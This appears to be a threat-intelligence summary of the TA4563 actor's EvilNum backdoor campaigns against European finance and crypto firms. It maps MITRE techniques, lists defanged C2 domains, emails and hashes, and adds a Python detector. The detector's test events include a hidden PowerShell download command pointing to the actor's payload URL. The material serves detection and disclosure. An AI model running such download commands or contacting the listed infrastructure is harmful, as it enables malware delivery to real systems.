TA4563 is a threat actor that uses the EvilNum backdoor to target European DeFi, cryptocurrency, and forex entities, with campaigns that keep changing how they deliver the malware and evade defenses. EvilNum functions as a backdoor for data theft and for loading additional payloads, and it includes components that evade detection and adapt the infection path to the antivirus product present on the target. #TA4563 #EvilNum #DeFi #cryptocurrency #forex
Key points
- TA4563 targets European financial and investment entities in the DeFi, cryptocurrency, and forex sectors with the EvilNum backdoor.
- EvilNum serves as a backdoor capable of data theft and loading follow-on payloads.
- Campaigns used ISO, Microsoft Word, and LNK files, remote templates, and OneDrive URLs to deliver EvilNum.
- Delivery campaigns evolved from late 2021 into 2022, including Word document lures and direct LNK payloads.
- The malware includes detection-evasion logic that adapts based on the host’s antivirus (e.g., Avast, AVG, Windows Defender) and uses existing local executables to evade defenses.
- Indicators of compromise include multiple domains, URLs, emails, and file hashes linked to EvilNum activity and C2 infrastructure.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – The first campaign observed delivered Microsoft Word documents that attempted to install the updated EvilNum backdoor. “The initial campaign observed included the attempted delivery of Microsoft Word documents responsible for the attempted installation of the updated version of the EvilNum backdoor.”
- [T1566.002] Spearphishing Link – Later emails varied the original campaign by delivering OneDrive URLs that hosted either an ISO or a .LNK attachment. “The group continued to target financial entities with a variation on the original email campaign, attempting to deliver multiple OneDrive URLs that contained either an ISO or .LNK attachment.”
- [T1059.001] PowerShell – The initial-stage LNK loader executes PowerShell via cmd.exe, which then downloads two different payloads from the initial host. “The initial stage LNK loader is responsible for executing PowerShell via cmd.exe, this then downloads two different payloads from the initial host (e.g. infntio[.]com).”
- [T1105] Ingress Tool Transfer – The malware downloads two different payloads from the initial host. “this then downloads two different payloads from the initial host (e.g. infntio[.]com).”
- [T1113] Screen Capture – The second PowerShell/C# stage sends screenshots to a command-and-control server (C2). “sends screenshots to a command-and-control server (C2).”
- [T1027] Obfuscated/Compressed Files and Information – The malware uses encrypted blobs that decrypt to executables and shellcode, including a final decrypted and decompressed PE file. “two encrypted blobs… The first is decrypted to an executable… The second to a TMP file… The final decrypted and decompressed PE file.”
- [T1562.001] Impair Defenses – The malware adjusts its execution chain to evade detection by the identified antivirus engine on the host. “The malware execution chain will change to best evade detection from the identified antivirus engine.”
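The T1059.001 and T1105 items above describe a cmd.exe → powershell.exe chain that fetches payloads from the initial host. The following detection logic is an added example (not from the report or from any vendor tool) that walks constructed, Sysmon-style process-creation events and flags a PowerShell child of cmd.exe whose command line contains a download primitive and a URL, raising severity when the host matches a domain listed on this page; the event records, field names, and command lines are constructed and defanged for illustration.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style); not real telemetry.
# The URL is defanged exactly as the report writes it.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": 'cmd.exe /c powershell -w hidden -c "iwr http://infntio[.]com/save/user.php -OutFile a.tmp"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -w hidden -c "iwr http://infntio[.]com/save/user.php -OutFile a.tmp"'},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c dir"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -c Get-Date"},  # benign cmd.exe -> powershell.exe, no download
]

# Payload / C2 domains taken from this page's indicator list (defanged form).
IOC_DOMAINS = {"infntio[.]com", "advflat[.]com", "outlookfnd[.]com"}

DOWNLOAD_RE = re.compile(r"(iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient)", re.I)
URL_RE = re.compile(r"https?://([a-z0-9.\[\]-]+)", re.I)


def normalize_host(host):
    """Compare hosts consistently whether they appear defanged ([.]) or not."""
    return host.lower().replace("[.]", ".")


def find_evilnum_chain(events):
    """Return alerts for powershell.exe spawned by cmd.exe with a download cmdlet and URL."""
    by_pid = {e["pid"]: e for e in events}
    iocs = {normalize_host(d) for d in IOC_DOMAINS}
    alerts = []
    for e in events:
        if not e["image"].lower().endswith("powershell.exe"):
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or not parent["image"].lower().endswith("cmd.exe"):
            continue  # only the cmd.exe -> powershell.exe link described in T1059.001
        if not DOWNLOAD_RE.search(e["cmd"]):
            continue  # no ingress tool transfer (T1105) primitive on the command line
        m = URL_RE.search(e["cmd"])
        if not m:
            continue
        host = m.group(1).lower()
        severity = "high" if normalize_host(host) in iocs else "medium"
        alerts.append({"pid": e["pid"], "host": host, "severity": severity})
    return alerts


if __name__ == "__main__":
    for alert in find_evilnum_chain(EVENTS):
        print(alert)
```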
Indicators of Compromise
- [Domain] – payload domains used by EvilNum infrastructure (e.g., mailgunltd[.]com, officelivecloud[.]com, azuredllservices[.]com)
- [URL] – Command/Control and payload delivery URLs (e.g., outlookfnd[.]com, infntio[.]com/save/user.php, advflat[.]com/save/user.php)
- [URL] – OneDrive delivery/redirect URLs used in campaigns (e.g., onedrive.live[.]com/download?resid=…)
- [Email] – sender addresses observed in campaigns (e.g., viktoria.helle79@zingamail[.]uk, arfeuille19@gmail[.]com, arone@…)
- [SHA256] – sample hashes linked to Word docs and LNK files (e.g., ef1a660ee8b11bbcf681e8934c5f16e4a249ba214d743bbf8b1f8043296b6ffc, da642cc233ea3595d8aaf8daf6129c59682b19462d5d5abb1f494042d4c044f4)
- [Domain] – additional command-and-control domains (e.g., outlookfnd[.]com, visitaustriaislands[.]com)